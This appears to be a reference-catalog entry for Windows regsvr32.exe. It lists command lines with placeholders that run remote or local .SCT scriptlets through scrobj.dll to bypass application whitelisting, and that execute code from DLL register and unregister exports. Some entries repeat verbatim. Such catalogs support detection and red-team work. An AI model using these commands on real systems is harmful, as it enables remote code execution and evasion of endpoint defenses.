Used by Windows to register dlls
Execute the specified remote .SCT script with scrobj.dll.
regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
Execute code from remote scriptlet, bypass Application whitelisting
Execute the specified local .SCT script with scrobj.dll.
regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
Execute code from scriptlet, bypass Application whitelisting
Execute the specified remote .SCT script with scrobj.dll.
regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
Execute code from remote scriptlet, bypass Application whitelisting
Execute the specified local .SCT script with scrobj.dll.
regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
Execute code from scriptlet, bypass Application whitelisting
Execute code in a DLL. The code must be inside the exported function DllRegisterServer
.
regsvr32.exe /s {PATH:.dll}
Execute DLL file
Execute code in a DLL. The code must be inside the exported function DllUnRegisterServer
.
regsvr32.exe /u /s {PATH:.dll}
Execute DLL file